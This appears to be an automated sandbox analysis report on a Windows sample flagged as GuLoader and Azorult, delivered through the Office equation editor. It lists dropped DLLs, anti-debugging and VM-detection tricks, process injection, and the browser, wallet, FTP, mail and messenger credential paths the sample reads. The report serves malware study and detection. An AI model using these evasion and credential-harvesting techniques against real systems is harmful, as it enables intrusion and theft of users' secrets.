Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130347616.000000001FC68000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.5.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130225554.000000001FC48000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130864345.000000001FCC4000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130962839.000000001FCEC000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.5.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
Source: Binary string: vcruntime140.i386.pdb source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130986178.000000001FCF0000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: hfoewnmm.exe, 00000005.00000003.2131902310.000000001F280000.00000004.00000001.sdmp, nssdbm3.dll.5.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.5.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: hfoewnmm.exe, 00000005.00000003.2128903368.000000001E854000.00000004.00000001.sdmp, msvcp140.dll.5.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2126896199.000000001FE38000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131037127.000000001FD10000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127011668.000000001FE38000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127758205.000000001FE38000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.5.dr

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: Process Memory Space: hfoewnmm.exe PID: 2528, type: MEMORY
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: hfoewnmm.exe PID: 2528, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040544E push cs; retf 4_2_00405454
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040586B pushad ; iretd 4_2_0040586C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00403C00 push FFFFFFAAh; retf 4_2_00403BEC
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040543A push cs; retf 4_2_00405440
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_004038D7 push ds; retf 4_2_004038D8
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040594C push ds; retf 4_2_00405954
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00402566 pushad ; iretd 4_2_0040256C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00402655 pushfd ; iretd 4_2_0040265B
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00403AD0 push esi; retf 4_2_00403AD8
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00404737 push ebx; retf 4_2_00404748
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040233B pushad ; iretd 4_2_0040233C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00402BD9 push ecx; retf 4_2_00402BDC
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00403BDA push FFFFFFAAh; retf 4_2_00403BEC
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00403BBD push edx; retf 4_2_00403BC4
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 5_3_1F2D850F pushfd ; ret 5_3_1F2D8517

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\softokn3.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\ucrtbase.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\mozglue.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\msvcp140.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\nssdbm3.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\freebl3.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\nss3.dll

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: hfoewnmm.exe, 00000004.00000002.2090923974.0000000000320000.00000040.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
Source: hfoewnmm.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Contains capabilities to detect virtual machines
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032003B rdtsc 4_2_0032003B
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\softokn3.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\nssdbm3.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\freebl3.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-console-l1-1-0.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2324 Thread sleep time: -300000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2324 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe TID: 2296 Thread sleep time: -1260000s >= -30000s
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe TID: 2812 Thread sleep count: 126 > 30
Source: hfoewnmm.exe, 00000004.00000002.2090923974.0000000000320000.00000040.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
Source: hfoewnmm.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032021B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00322C9A,6DDB9555,? 4_2_0032021B
Hides threads from debuggers
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032003B rdtsc 4_2_0032003B
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321CE2 LdrInitializeThunk, 4_2_00321CE2
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00322C73 mov eax, dword ptr fs:[00000030h] 4_2_00322C73
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321046 mov eax, dword ptr fs:[00000030h] 4_2_00321046
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00320CE5 mov eax, dword ptr fs:[00000030h] 4_2_00320CE5
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032197F mov eax, dword ptr fs:[00000030h] 4_2_0032197F
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321189 mov eax, dword ptr fs:[00000030h] 4_2_00321189
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032118C mov eax, dword ptr fs:[00000030h] 4_2_0032118C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00322F1B mov eax, dword ptr fs:[00000030h] 4_2_00322F1B
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003233E0 mov eax, dword ptr fs:[00000030h] 4_2_003233E0
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003233EC mov eax, dword ptr fs:[00000030h] 4_2_003233EC

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe

Language, Device and Operating System Detection:

Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Azorult
Source: Yara match File source: 00000005.00000003.2136713205.000000001FC44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hfoewnmm.exe PID: 2628, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %appdata%\Electrum\wallets\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Exodus\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets\
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Searches for user specific document files
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX